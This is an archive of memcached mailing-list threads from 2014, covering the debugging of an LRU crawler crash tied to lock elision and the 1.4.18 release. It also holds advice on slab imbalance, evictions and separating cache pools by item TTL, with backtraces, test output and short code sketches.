   
   
Didn't change anything, same two failures with the same output listed.

 I feel like something's a bit different between your two tests. In the
 first set, it's definitely not crashing for the 64bit test, but not
 working either. Is something weird going on with the second set of tests?
 You noted it seems to be running a 32bit binary still.

 I'm willing to ignore the 64-bit failures for now until we figure out the 
 32-bit ones.

 In any case, I wouldn't blame the cross-compile or toolchain, these have all 
 been built in very clean, single architecture systemd-nspawn chroots.

Thanks, I'm just trying to reason why it's failing in two different ways.
The initial failure of finding 90 items when it expected 60 is a timing
glitch, the other ones are this thread crashing the daemon.



Re: 1.4.18

2014-04-19 Thread dormando
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xf7dbfb40 (LWP 7)]
0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0
(gdb) bt
#0  0xf7f7f988 in __lll_unlock_elision () from 
 /usr/lib/libpthread.so.0
#1  0xf7f790e0 in __pthread_mutex_unlock_usercnt () from 
 /usr/lib/libpthread.so.0
#2  0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /usr/lib/libpthread.so.0
#3  0x08061bfe in item_crawler_thread ()
#4  0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0
#5  0xf7ead94e in clone () from /usr/lib/libc.so.6

 Holy crap lock elision. I have one machine with a haswell chip here, but
 I'll have to USB boot. Is getting an Arch liveimage especially time
 consuming?


 Not at all; if you download the latest install ISO 
 (https://www.archlinux.org/download/) it is a live CD and you can boot 
 straight into an Arch
 environment. You can do an install if you want, or just run live and install 
 any necessary packages (`pacman -S base-devel gdb`) and go from there.

Okay, seems like I'll have to give it a shot since this still isn't
working well.
  

   https://github.com/dormando/memcached/tree/crawler_fix

   Can you try this? The lock elision might've made my undefined behavior
   mistake of not holding a lock before initially waiting on the condition
   fatal.

   A further fix might be required, as it's possible someone could kill the
   do_etc flag before the thread fully starts and it'd drop out with the 
 lock
   held. That would be an incredible feat though.


 The good news here is now that we found our way to lock elision, both 64-bit 
 and 32-bit builds (including one straight from git and outside the
 normal packaging build machinery) blow up in the same place. No segfault 
 after applying this patch, so we've made progress.

I love progress.

   
      Thanks!
   
      
             On the 64bit host, can you try increasing the sleep on 
 t/lru-crawler.t:39
             from 3 to 8 and try again? I was trying to be clever 
 but that may not be
             working out.
      
      
       Didn't change anything, same two failures with the same 
 output listed.
   
I feel like something's a bit different between your two tests. In the
first set, it's definitely not crashing for the 64bit test, but not
working either. Is something weird going on with the second set of 
 tests?
You noted it seems to be running a 32bit binary still.
   
I'm willing to ignore the 64-bit failures for now until we figure out 
 the 32-bit ones.
   
In any case, I wouldn't blame the cross-compile or toolchain, these 
 have all been built in very clean, single architecture
   systemd-nspawn chroots.

 Thanks, I'm just trying to reason why it's failing in two different ways.
 The initial failure of finding 90 items when it expected 60 is a timing
 glitch, the other ones are this thread crashing the daemon.


 One machine was an i7 with TSX, thus the lock elision segfaults. The other is 
 a much older Core2 machine. Enough differences there to cause
 problems, especially if we are dealing with threading-type things?

Can you give me a summary of what the core2 machine gave you? I've built
on a core2duo and nehalem i7 and they all work fine. I've also torture
tested it on a brand new 16 core (2x8) xeon.

 On the i7 machine, I think we're still experiencing segfaults. Running just 
 the LRU test; note the two undef values showing up again:

 $ prove t/lru-crawler.t
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'

 #   Failed test 'disabled lru crawler'
 #   at t/lru-crawler.t line 69.
 #  got: undef
 # expected: 'OK
 # '

 #   Failed test at t/lru-crawler.t line 72.
 #  got: undef
 # expected: 'no'
 # Looks like you failed 4 tests of 189.
 t/lru-crawler.t .. Dubious, test returned 4 (wstat 1024, 0x400)
 Failed 4/189 subtests


 Changing the `sleep 3` to `sleep 8` gives non-deterministic results; two runs 
 in a row were different.

 $ prove t/lru-crawler.t
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'

 #   Failed test 'ifoo29 == 'ok''
 #   at /home/dan/memcached/t/lib/MemcachedTest.pm line 59.
 #  got: undef
 # expected: 'VALUE ifoo29 0 2
 # ok
 # END
 # '
 t/lru-crawler.t .. Failed 10/189 subtests

 Test Summary Report
 ---
 t/lru-crawler.t

Re: 1.4.18

2014-04-19 Thread dormando
 On Sat, Apr 19, 2014 at 6:05 PM, dormando dorma...@rydia.net wrote:
   
Once I wrapped my head around it, figured this one out. This cheap 
 patch fixes the test, although I'm not sure it is the best actual solution. 
 Because we don't set the lru_crawler_running flag on the main thread, but in 
 the LRU thread itself, we have a race condition here. pthread_create() is by 
 no means required to actually start the thread
   right away or
schedule it, so the test itself asks too quickly if the LRU crawler 
 is running, before the auxiliary thread has had the time to mark it as 
 running. The sleep ensures we at least give that thread time to start.
   
(Debugged by way of adding a print to STDERR statement in the 
 while(1) loop. The only time I saw the test actually pass was when that loop 
 caught and repeated itself for a while. It failed when it only ran once, 
 which would make sense if the thread hadn't actually set the flag yet.)
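
(A minimal sketch of that startup race and one possible shape of a fix,
assuming a lru_crawler_running flag like the one discussed; this is not
the actual patch: set the flag in the creating thread so it is visible
the moment pthread_create() returns.)

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t lru_lock = PTHREAD_MUTEX_INITIALIZER;
    static int lru_crawler_running = 0;

    static void *item_crawler_thread(void *arg) {
        /* ... crawl ... then mark ourselves stopped on the way out */
        pthread_mutex_lock(&lru_lock);
        lru_crawler_running = 0;
        pthread_mutex_unlock(&lru_lock);
        return arg;
    }

    /* The racy shape sets lru_crawler_running inside the new thread, so a
     * stats call right after pthread_create() can still observe 0. */
    static int start_item_crawler(void) {
        pthread_t tid;
        pthread_mutex_lock(&lru_lock);
        lru_crawler_running = 1;          /* visible before the thread runs */
        pthread_mutex_unlock(&lru_lock);
        if (pthread_create(&tid, NULL, item_crawler_thread, NULL) != 0) {
            pthread_mutex_lock(&lru_lock);
            lru_crawler_running = 0;      /* roll back on failure */
            pthread_mutex_unlock(&lru_lock);
            return -1;
        }
        pthread_detach(tid);
        return 0;
    }

    int main(void) {
        if (start_item_crawler() == 0)
            puts("crawler started; running flag already set");
        return 0;
    }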

 Ahh okay. Weird that you're able to see that, as the crawl command signals
 the thread. Hmm... no easy way to tell if it *had* fired or if it's not
 yet fired.

 The parts I thought really hard about seem to be doing okay, but the
 scaffolding I apparently goofed fairly bad, heh.

 I just pushed another commit to the crawler_fix tree, can you try it and
 see if it works with an unmodified test?


 We're good to go now, as far as I can tell. Ran the LRU test about 10 times 
 on both machines I've been using today and it works every time now; no 
 problems with the full test suite at this point either.

Cool, thanks again. I just pushed these changes to master. I kinda want to
find some other stuff to put in before shoveling out a .19 though. Are you
a packager for Arch? Can you ship .18 with the patches?



Re: Memcached somehow hangs or stops working

2014-04-17 Thread dormando
exhausted memory isn't going to cause it to pause...

http://memcached.org/timeouts for the typical run-through of timeout
problems.

On Tue, 15 Apr 2014, Suraj Narkhede wrote:

 Or maybe it's that you have exhausted your memory. Can you please check in the 
 stats if there is any eviction_count? This problem will also get
 solved once memcached is restarted.

 Suraj


 On Tue, Apr 15, 2014 at 1:14 PM, Jon Hauksson jon.hauks...@storytel.com 
 wrote:
   Hi, 
 thanks for the answers. We will try to upgrade. Yes, it does not work just to 
 flush memcached, we have to restart them, so maybe it's
 the persistent connections.

 Den måndagen den 14:e april 2014 kl. 19:50:01 UTC+2 skrev Jon Hauksson:
   Hi,
 I work at a company where we use memcached and suddenly it stops working 
 every 3 days or so. We did not really catch the problem at
 first but now we have narrowed it down to memcached. Every time we restart 
 our 2 memcached servers the system gets under control again.
 But when this happens we do not see any real problems in the logs etc...but 
 it comes back after a restart of memcached. It does not
 work to just flush. If somebody has some information on what the problem 
 could be it would be appreciated.

 We have 2 memcached servers on cent os and the startup options are:

 memcached -d -m 4096 -c 4096 -t 25

 Thanks,
 Jon








LRU Crawler + stuff for 1.4.18

2014-04-17 Thread dormando
Yo,

A bunch of good fixes from Steven Grimm went into master a few months ago,
but I was too busy to finish the release. I've thrown in a few more things
and we'll call this 1.4.18 shortly, unless someone finds a major flaw:

Steven fixed a bunch of potential reference leaks, and added a stats
conns command:
https://github.com/memcached/memcached/pull/60

I made the hash algo selectable (existing jenkins, murmurhash3 to start
with):
https://github.com/memcached/memcached/pull/66

and an LRU crawler:
https://github.com/memcached/memcached/pull/64

Just want to do two more tiny commits on the crawler before merging and
releasing the whole thing I think. Unless someone has major ideas/etc?
I spent a little bit of time benchmarking it and it seems to be
functioning fine, but I didn't go into a ton of depth in the torture. If
the feature isn't enabled the code paths don't do anything at all, so if
something is broken it won't harm people.

have fun,
-Dormando



1.4.18

2014-04-17 Thread dormando
http://code.google.com/p/memcached/wiki/ReleaseNotes1418



Re: Memcached somehow hangs or stops working

2014-04-14 Thread dormando
What version are you using? If less than 1.4.17, please upgrade to the
latest version.

Also, -t 25 is a huge waste. Use -t 4 unless you're doing more than
several hundred thousand requests per second.
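
In other words, the startup line quoted below would become:

    memcached -d -m 4096 -c 4096 -t 4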

On Mon, 14 Apr 2014, Jon Hauksson wrote:

 Hi,
 I work at a company where we use memcached and suddenly it stops working 
 every 3 days or so. We did not really catch the problem at first but now we
 have narrowed it down to memcached. Every time we restart our 2 memcached 
 servers the system gets under control again. But when this happens we do
 not see any real problems in the logs etc...but it comes back after a restart 
 of memcached. It does not work to just flush. If somebody has some
 information on what the problem could be it would be appreciated.

 We have 2 memcached servers on cent os and the startup options are:

 memcached -d -m 4096 -c 4096 -t 25

 Thanks,
 Jon






Re: Idea for reclamation algo

2014-04-13 Thread dormando
Yes :) If I recall how that works, it's mildly similar to a few other
things I've seen. Not super trivial to implement in a short period of time
though.

On Sat, 12 Apr 2014, Ryan McElroy wrote:

 Facebook implemented a visitor plugin system that we use to kick out 
 already-expired items in our memcached instances. It runs at low priority
 and doesn't cause much latency that we notice. I should really get our 
 version back out there so that others can see how we did it and implement it
 in the legit memcached :-)
 ~Ryan


 On Fri, Apr 11, 2014 at 11:08 AM, dormando dorma...@rydia.net wrote:
   s/pagging/padding/. gah.

   On Fri, 11 Apr 2014, dormando wrote:

   
   
On Fri, 11 Apr 2014, Slawomir Pryczek wrote:
   
 Hi Dormando, more about the behaviour... when we're using normal 
 memcached 1.4.13 16GB of memory gets exhausted in ~1h, then we
   start to have
 almost instant evictions of needed items (again these items aren't 
 really needed individually, just when many of them gets
   evicted it's
 unacceptable because of how badly it affects the system)
   
Almost instant evictions; so an item is stored, into a 16GB instance, 
 and
 120 seconds later is bumped out of the LRU?
   
You'll probably just ignore me again, but isn't this just slab 
 imbalance?
Once your instance fills up there're probably a few slab classes with 
 way
too little memory in them.
   
'stats slabs' shows you per-slab eviction rates, along with the last
accessed time of an item when it was evicted. What does this look 
 like on
one of your full instances?
   
The slab rebalance system lets you plug in your own algorithm by 
 running
the page reassignment commands manually. Then you can smooth out the 
 pages
to where you think they should be.
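
(For reference, the manual interface is a pair of protocol commands; this
is from memory, so check protocol.txt in your release for the exact syntax:

    slabs automove 0
    slabs reassign <source class> <dest class>

with automove off, your own algorithm decides which page moves where.)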
   
You mention long and short TTL, but what are they exactly? 120s and an
hour? A week?
   
I understand your desire to hack up something to solve this, but as 
 you've
already seen scanning memory to remove expired items is problematic:
you're either going to do long walks from the tail, use a background
thread and walk a probe item through, or walk through random slab 
 pages
looking for expired memory. None of these are very efficient and tend 
 to
rely on luck.
   
A better way to do this is to bucket the memory by TTL. You have lots 
 of
pretty decent options for this (and someone else already suggested 
 one):
   
- In your client, use different memcached pools for major TTL buckets (ie;
one instance only gets long items, one only short; see the sketch below).
Make sure the slabs aren't imbalanced via the slab rebalancer.
   
- Are the sizes of the items correlated with their TTL? Are 120s items
always in a ~300 byte range and longer items tend to be in a different
byte range? You could use length pagging to shunt them into specific 
 slab
classes, separating them internally at the cost of some ram 
 efficiency.
   
- A storage engine (god I wish we'd made 1.6 work...) which allows
bucketing by TTL ranges. You'd want a smaller set of slab classes to 
 not
waste too much memory here, but the idea is the same as running 
 multiple
individual instances, except internally splitting the storage engine
instead and storing everything in the same hash table.
   
Those three options completely avoid latency problems, the first one
requires no code modifications and will work very well. The third is 
 the
most work (and will be tricky due to things like slab rebalance, and 
 none
of the slab class identification code will work). I would avoid it 
 unless
I were really bored and wanted to maintain my own fork forever.
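
A hypothetical sketch of the first option above (pool hosts and the TTL
threshold are made-up values, and the client API is whatever your stack
provides; only the routing decision matters):

    #include <stdio.h>

    /* Route each set() to one of two memcached pools by the item's TTL. */
    #define SHORT_TTL_MAX 600            /* <= 10 minutes -> "short" pool */

    typedef struct { const char *host; int port; } pool_t;

    static pool_t short_pool = { "mc-short.example.com", 11211 };
    static pool_t long_pool  = { "mc-long.example.com",  11211 };

    static pool_t *pool_for_ttl(int ttl_seconds) {
        return (ttl_seconds <= SHORT_TTL_MAX) ? &short_pool : &long_pool;
    }

    int main(void) {
        printf("120s item -> %s\n", pool_for_ttl(120)->host);
        printf("5h item   -> %s\n", pool_for_ttl(5 * 3600)->host);
        return 0;
    }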
   
 ~2 years ago i created another version based on that 1.4.13, than 
 does garbage collection using custom stats handler. That version
   is able to be
 running on half of the memory for like 2 weeks, with 0 evictions. 
 But we gave it full 16G and just restart it each week to be sure
   memory usage is
 kept in check, and we're not throwing away good data. Actually 
 after changing -f1.25 to -f1.041 the slabs are filling with bad
   items much slower,
 because items are distributed better and this custom eviction 
 function is able to catch more expired data. We have like 200GB of
   data evicted this
 way, daily. Because of volume (~40k req/s peak, much of it are 
 writes) and differences in expire time LRU isn't able to reclaim
   items efficiently.

 Maybe people don't even realize the problem, but when we done some 
 testing and turned off that custom eviction we had like 100%
   memory used

Re: Idea for reclamation algo

2014-04-13 Thread dormando
 Hey Dormando...

 Some quick question first... I have checked some Intel papers on their 
 memcached fork and for 1.6 it seems that there's some rather big lock
 contention... have you thought about just gluing individual items to a 
 thread, using maybe the item hash or some configurable method... this way 2
 threads won't be able to access the same item at one time. I'm wondering what 
 would be the problems with such an approach because it seems rational at first
 glance, instead of locking the whole cache... I'm just curious. Is there some 
 release plan for 1.6... I think 2-3 years ago it was in
 development... are you getting closer to releasing it?

The 1.4 tree has much less lock contention than 1.6. I made repeated calls for
people to help pull bugs out of 1.6 and was ignored, so I ended up
continuing development against 1.4... There's no whole-cache lock in 1.4;
there's a whole-LRU lock, but the operations are a lot shorter. It's much
much faster than the older code.

 I'm not ignoring your posts; actually i read them but didn't want my 
 posts to be too large. Actually we tried using several other things beside
 memcached. After switching from mysql with some memory tables to memcached ~2 
 years ago, measured throughput went from 40-50 req/s to about 4000
 r/s. Back then it was fine; then when traffic went higher the cache was 
 barely able to evict items at all.

 Changing infrastructure in a project that has been in development for over 2 years 
 is not an easy thing. We also tested some other things like mongodb and
 redis back then... and we just CAN'T have this data hitting disks. 
 Maybe now there are more options, but we are already considering a golang or
 C rewrite for this part... we don't want to switch to some other shared 
 memory-ish system, just be able to access data directly between calls and
 do locking ourselves.

 So, again, as for the current solution: decisions about what tools we use were 
 made a very long time ago, and are not easy to change now.

 Almost instant evictions; so an item is stored into a 16GB instance, and  
 120 seconds later is bumped out of the LRU? 

 Yes, the items we insert for TTL=120 to 500s are not able to stay in cache 
 even for 60s, when we start to read/aggregate them, and are thrown away
 instead of the garbage. I understand why that is...
 S - short TTL
 L - long TTL
 SSSLSSS - when we insert an L item, no S items before the L will ever be able 
 to get reclaimed with the current algo, because new L items will appear
 later too... for LRU to work optimally under high load, every item should 
 have nearly the same TTL in a given slab. You could try to reclaim from
 the top and bottom, but this way one hold-forever item would break the whole 
 thing as soon as it gets to the top.

I understand this part, I just find it suspicious.

 The longest items in the pool are set for 5-6h. And unfortunately item size is in 
 no way correlated with TTL. We eg. store UA analysis and geo data for 5h. These
 items are very short, as short as eg. impression counters.

Ok. Any idea what the ratio of long to short is? Like 10% 120s / 90% 5h, or
the reverse, or whatever?

 You'll probably just ignore me again, but isn't this just slab imbalance? 
 No it isn't... how in hell can slab imbalance happen over just 1h, without 
 code changes ;)

I can make slab imbalance happen in under 10 seconds. Not really the
point: Slab pages are pulled from the global pool as-needed as memory
fills. If your traffic has ebbs and flows, or tends to set a lot more
items in one class than others it will immediately fill and others will
starve.

  A better way to do this is to bucket the memory by TTL. You have lots of 
  pretty decent options for this (and someone else already suggested one):
 Sure, if we knew back then, we'd just create 3-4 memcached instances, add some 
 API and shard the items based on requested TTL.

You can't do that now? That doesn't really seem that hard and doesn't
change the fundamental infrastructure... It'd be a lot easier than
maintaining your own fork of memcached forever, I'd think.

  The slab rebalance system lets you plug in your own algorithm by running 
  the page reassignment commands manually. Then you can smooth out the pages
  to where you think they should be. 
 Sure, but that's actually not my problem... the problem is that my slabs are 
 full of expired items, so this would require some hacking of that slab
 rebalance algo (am i right?)... and it seems a little complicated to me to 
 be done in 3-4 days' time.

Bleh.

  A better way to do this is to bucket the memory by TTL. You have lots of 
  pretty decent options for this (and someone else already suggested one)
 Haha, sure it's better :) We'd obviously have done that if we knew 2 years
 ago what we know now :)

 I actually wrote some quick code to redirect about 20% of the traffic we're 
 sending/receiving to/from memcached to my hacked version... for all times
 on the screens you need to subtract 5 minutes (we ran memcached, then enabled the 
 code 5

Re: Idea for reclaimation algo

2014-04-13 Thread dormando
 On Sun, 13 Apr 2014, Slawomir Pryczek wrote:

  So high evictions when the cleaning algo isn't enabled could be caused by slab 
  imbalance due to high-memory slabs eating most of the ram... and i just
  incorrectly assumed low TTL items are expired before high TTL items, 
  because in such cases the cache didn't have enough memory to store all the
  low TTL items, and both low and high TTLs were evicted, interesting...

 yes.

  So you're saying that to evict some item X, i'd need to write AT 
  LEAST as many new items as X's slab contains, because items are
  added at the head, and you're removing from the tail, right?

 yes. It's actually worse than that, since deleting items or fetching
 expired ones will make extra room, slowing it down.

Actually, even worse than that still: During an allocation the
*bottommost* item in the LRU is always checked for expiration before more
memory is assigned. (this is the 'reclaimed' stat). So if you have a cache
with only items of a TTL 60s, you will stop assigning memory if you set
into the cache slower than they expire.
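
For illustration, the shape of that tail check looks roughly like this (a
simplified sketch with made-up names, not the actual do_item_alloc() code):

    /* Sketch of the tail-expiry check described above. The item layout
     * and function are simplified illustrations, not memcached source. */
    typedef struct _item {
        struct _item *prev;   /* toward the LRU head (most recent) */
        struct _item *next;   /* toward the LRU tail (least recent) */
        time_t exptime;       /* absolute expiry time; 0 = never expires */
        /* key/value storage elided */
    } item;

    /* Before allocating new memory, peek at the LRU tail: if the oldest
     * item has already expired, unlink and reuse it in place. This is
     * what shows up in the 'reclaimed' stat. */
    item *reclaim_tail(item **tail, time_t now) {
        item *it = *tail;
        if (it != NULL && it->exptime != 0 && it->exptime <= now) {
            *tail = it->prev;
            if (it->prev != NULL)
                it->prev->next = NULL;
            return it;        /* reclaimed; no new allocation needed */
        }
        return NULL;          /* nothing expired; go to the allocator */
    }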

  Sending some slab stats, and the TTL left for slab 1 where there are no 
  evictions + slab 2 where there are plenty. Unfortunately i can't send dumps,
  as these contain some sensitive data.
  http://img.liczniki.org/20140414/slabs_all_918-1397431358.png

 Can you *please* send a text dump of stats items and stats slabs? Just
 grep out or censor what you don't want to share? Doing math against a
 picture is a huge annoyance. It's also missing important counters I'd like
 to look at.

  For the ratio of long/short, it's hard to tell... but most are definitely short.
 
  Slab class 3 has 1875968 total chunks in your example, which means in 
  order to cause a 120s item to evict early you need to insert into *that 
  slab class* at a rate of 15,000 items per second, unless it's a multi-hour 
  item instead. In which case what you said is happening but reversed: lots 
  of junk 120s items are causing 5hr items to evict, but after many minutes 
  and definitely not mere seconds. 
 
  Yes, but as you can see this class only contains 15% valid data and has 
  plenty of evictions. The next class contains 7% valid data, but still
  has 4 evictions. Probably it would be best just to keep TTLs the same for all 
  data...

 Your main complaint has been that 120s values don't persist for more than
 60s; there's a 0% chance of any items in slab class 3 having a TTL of
 120s.

 If you kept the TTL's all the same, what would they be? If they were all
 120s and you rebalanced slabs, you'd probably never have a problem (but
 it seemed like you needed some data for longer).

  On Sunday, 13 April 2014 at 21:12:43 UTC+2, Dormando wrote:
 Hey Dormando...

 A quick question first... i have checked some Intel papers on their
 memcached fork and for 1.6 it seems that there's some rather big lock
 contention... have you thought about just gluing individual items to a
 thread, using maybe the item hash or some configurable method... this way 2
 threads won't be able to access the same item at one time. I'm wondering
 what would be the problems with such an approach, because it seems rational
 at first glance, instead of locking the whole cache... I'm just curious. Is
 there some release plan for 1.6... i think 2-3 years ago it was in
 development... are you getting closer to releasing it?
 
 The 1.4 tree has much less lock contention than 1.6. I made repeated calls
 for people to help pull bugs out of 1.6 and was ignored, so I ended up
 continuing development against 1.4... There's no whole-cache lock in 1.4;
 there's a whole-LRU lock, but the operations are a lot shorter. It's much
 much faster than the older code.
 
 I'm not ignoring your posts; actually i read them but didn't want my
 posts to be too large. Actually we tried using several other things
 beside memcached. After switching from mysql with some memory tables to
 memcached ~2 years ago, measured throughput went from 40-50 req/s to
 about 4000 r/s. Back then it was fine; then when traffic went higher the
 cache was barely able to evict items at all.

 Changing infrastructure in a project that has been in development for
 over 2 years is not an easy thing. We also tested some other things like
 mongodb and redis back then... and we just CAN'T have this data hitting
 disks. Maybe now there are more options, but we are already considering
 a golang or C rewrite for this part... we don't want to switch to some
 other shared memory-ish system, just be able to access data directly
 between calls and do locking ourselves.

 So, again, as for the current solution: decisions about what tools we
 use were made a very long time ago, and are not easy

Re: Idea for reclaimation algo

2014-04-11 Thread dormando


On Fri, 11 Apr 2014, Slawomir Pryczek wrote:

 Hi Dormando, more about the behaviour... when we're using normal memcached 
 1.4.13, 16GB of memory gets exhausted in ~1h, then we start to have
 almost instant evictions of needed items (again, these items aren't really 
 needed individually; just when many of them get evicted it's
 unacceptable because of how badly it affects the system)

Almost instant evictions; so an item is stored into a 16GB instance, and
 120 seconds later is bumped out of the LRU?

You'll probably just ignore me again, but isn't this just slab imbalance?
Once your instance fills up there're probably a few slab classes with way
too little memory in them.

'stats slabs' shows you per-slab eviction rates, along with the last
accessed time of an item when it was evicted. What does this look like on
one of your full instances?

The slab rebalance system lets you plug in your own algorithm by running
the page reassignment commands manually. Then you can smooth out the pages
to where you think they should be.
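
For example, against the ASCII protocol (memcached 1.4.11 or newer) a manual
page move looks like this; the class numbers here are just placeholders:

    $ printf "slabs automove 0\r\n" | nc localhost 11211    # take over from the automover
    OK
    $ printf "slabs reassign 3 5\r\n" | nc localhost 11211  # move one page from class 3 to class 5
    OK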

You mention long and short TTL, but what are they exactly? 120s and an
hour? A week?

I understand your desire to hack up something to solve this, but as you've
already seen scanning memory to remove expired items is problematic:
you're either going to do long walks from the tail, use a background
thread and walk a probe item through, or walk through random slab pages
looking for expired memory. None of these are very efficient and tend to
rely on luck.

A better way to do this is to bucket the memory by TTL. You have lots of
pretty decent options for this (and someone else already suggested one):

- In your client, use different memcached pools for major TTL buckets (ie;
one instance only gets long items, one only short). Make sure the slabs
aren't imbalanced via the slab rebalancer.

- Are the sizes of the items correlated with their TTL? Are 120s items
always in a ~300 byte range and longer items tend to be in a different
byte range? You could use length pagging to shunt them into specific slab
classes, separating them internally at the cost of some ram efficiency.

- A storage engine (god I wish we'd made 1.6 work...) which allows
bucketing by TTL ranges. You'd want a smaller set of slab classes to not
waste too much memory here, but the idea is the same as running multiple
individual instances, except internally splitting the storage engine
instead and storing everything in the same hash table.

Those three options completely avoid latency problems; the first one
requires no code modifications and will work very well. The third is the
most work (and will be tricky due to things like slab rebalance, and none
of the slab class identification code will work). I would avoid it unless
I were really bored and wanted to maintain my own fork forever.
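
As a sketch of that first option, the client-side routing can be as simple
as this (libmemcached; the host names and the 300s cutoff are placeholders,
not a recommendation):

    /* Sketch: route sets to a pool based on TTL so short- and long-lived
     * items never share an instance. Hosts and cutoff are illustrative. */
    #include <libmemcached/memcached.h>
    #include <string.h>

    static memcached_st *short_pool;  /* only ever holds short-TTL items */
    static memcached_st *long_pool;   /* only ever holds long-TTL items */

    void pools_init(void) {
        short_pool = memcached_create(NULL);
        long_pool  = memcached_create(NULL);
        memcached_server_add(short_pool, "cache-short.example.com", 11211);
        memcached_server_add(long_pool,  "cache-long.example.com", 11211);
    }

    memcached_return_t set_by_ttl(const char *key, const char *val,
                                  size_t vlen, time_t ttl) {
        /* 300s is an arbitrary example boundary between short and long */
        memcached_st *pool = (ttl <= 300) ? short_pool : long_pool;
        return memcached_set(pool, key, strlen(key), val, vlen, ttl, 0);
    }

Reads need the same routing rule, so a key is always looked up in the pool
it was written to.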

 ~2 years ago i created another version based on that 1.4.13, that does 
 garbage collection using a custom stats handler. That version is able to
 run on half of the memory for like 2 weeks, with 0 evictions. But we gave 
 it the full 16G and just restart it each week to be sure memory usage is
 kept in check, and we're not throwing away good data. Actually after changing 
 -f1.25 to -f1.041 the slabs are filling with bad items much slower,
 because items are distributed better and this custom eviction function is 
 able to catch more expired data. We have like 200GB of data evicted this
 way, daily. Because of volume (~40k req/s peak, much of it writes) and 
 differences in expire time the LRU isn't able to reclaim items efficiently.

 Maybe people don't even realize the problem, but when we did some testing 
 and turned off that custom eviction we had like 100% memory used with
 10% waste reported by the memcached admin. But when we ran that custom 
 eviction algorithm it turned out that 90% of memory was occupied by garbage.
 Reported waste grew to 80% instantly after running an unlimited reclaim of 
 expired items on everything in the cache. So with a standard client, when people
 use different expire times for items (we have it like 1 minute minimum, 
 6h max)... they won't even be able to see how much memory they're
 wasting in some specific cases, when they have many items that won't be 
 hit after expiration, like we have.

 When using memcached as a buffer for mysql writes, we know exactly what to 
 hit and when. Short TTL expired items pile up near the head... long TTL
 live items pile up near the tail, and that creates a barrier that prevents 
 the LRU algo from reclaiming almost anything, if i'm getting how it
 currently works correctly...

  You made it sound like you had some data which never expired? Is this true? 
 Yes, i think because of how evictions are made (to be clear, we're not setting 
 non-expiring items). These short-expiring items pile up at the front
 of the linked list; something that is supposed to live for eg. 120 or 180 seconds 
 is lingering in memory forever, until we restart the cache... and
 new items are killed

Re: Idea for reclaimation algo

2014-04-11 Thread dormando
s/pagging/padding/. gah.


Re: Idea for reclaimation algo

2014-04-10 Thread dormando

 Hey Dormando, thanks again for some comments... appreciate the help.

 Maybe i wasn't clear enough. I need only 1 minute persistence, and i can lose 
 data sometimes, just i can't keep loosing data every minute due to
 constant evictions caused by LRU. Actually i have just wrote that in my 
 previous post. We're loosing about 1 minute of non-meaningfull data every
 week because of restart that we do when memory starts to fill up (even with 
 our patch reclaiming using linked list, we limit reclaiming to keep
 speed better)... so the memory fills up after a week, not 30 minutes...

Can you explain what you're seeing in more detail? Your data only needs to
persist for 1 minute, but it's being evicted before 1 minute is up?

You made it sound like you had some data which never expired? Is this
true?

If your instance is 16GB, takes a week to fill up, but data only needs to
persist for a minute but isn't, something else is very broken? Or am I
still misunderstanding you?

 Now i'm creating a better solution, to limit locking as the linked list gets 
 bigger.

 I explained the worst implications of unwanted evictions (or losing all 
 data in cache) in my use case:
 1. losing ~1 minute of non-significant data that's about to be stored in sql
 2. flat distribution of load to workers (not taking response times into 
 account because stats reset).
 3. resorting to an alternative targeting algorithm (with global, not local 
 statistics).

 I never, ever said i'm going to write data that has to be persistent 
 permanently. It's actually the same idea as delayed writes. If power fails you
 lose 5s of data, but you can do 100x more writes. So you need the data to be 
 persistent in memory; between writes the data **can't be lost**.
 However you can lose it sometimes; that's a tradeoff that some people can 
 make and some can't. Obviously i can't keep losing this data every
 minute, because if i lose too much it'll become meaningful.

 Maybe i wasn't clear on that matter. I can lose all data even 20 times a 
 day. Sensitive data is stored using bulk updates or transactions,
 bypassing that delayed-write layer. 0 evictions, that's the kind of 
 persistence i'm going for. So items are persistent for some very short
 periods of time (1-5 minutes) without being killed. It's just a different use 
 case. Running in production for 2 years, based on 1.4.13, tested for
 correctness, monitored so we have enough memory and 0 evictions (just reclaims)

 When i came here with the same idea ~2 years ago you just said it's very stupid; 
 now you even made me look like a moron :) And i can understand why you
 don't want features that are not ~O(1) perfectly, but please don't get so 
 personal about different ideas to do things and use cases, just because
 these won't work for you.





 On Thursday, 10 April 2014 at 20:53:12 UTC+2, Dormando wrote:
   You really really really really really *must* not put data in memcached
   which you can't lose.

   Seriously, really don't do it. If you need persistence, try using a redis
   instance for the persistent stuff, and use memcached for your cache stuff.
   I don't see why you feel like you need to write your own thing; there are a
   lot of persistent key/value stores (kyotocabinet/etc?). They have a much
   lower request ceiling and don't handle the LRU/cache pattern as well, but
   that's why you can use both.

   Again, please please don't do it. You are damaging your company. You are a
   *danger* to your company.

   On Thu, 10 Apr 2014, Slawomir Pryczek wrote:

Hi Dormando, thanks for the suggestions; a background thread would be nice...
The idea is actually that with 2-3GB i get plenty of evictions of items that
need to be fetched later. And with 16GB i still get evictions; actually i
could probably throw even more memory than 16G at it and it'd only result in
more expired items sitting in the middle of slabs, forever... Now i'm going
for persistence. Sounds crazy, probably, but we're having some data that we
can't lose:
1. statistics: we aggregate writes to the DB using memcached (+ a list
implementation). If these items get evicted we're losing rows in the db.
Losing data sometimes isn't a big problem. Eg. we restart memcached once a
week, so we lose 1 minute of data every week. But if we have evictions we're
losing data constantly (which we can't have)
2. we drive a load balancer using data in memcached for statistics; again,
not nice to lose data often, because workers can get an incorrect amount of
traffic.
3. we're doing some adserving optimizations, eg. counting per-domain ad
priority; for one domain it takes about 10 seconds to analyze all data and
create the list of ads, so it can't be done online... we put the result of
this in memcached, and if we lose too much of this the system will start

Re: Memcached version 1.4, 1.6

2014-04-09 Thread dormando
1.4 is the latest stable. 1.6 is a development branch.

On Tue, 8 Apr 2014, Vakul Garg wrote:

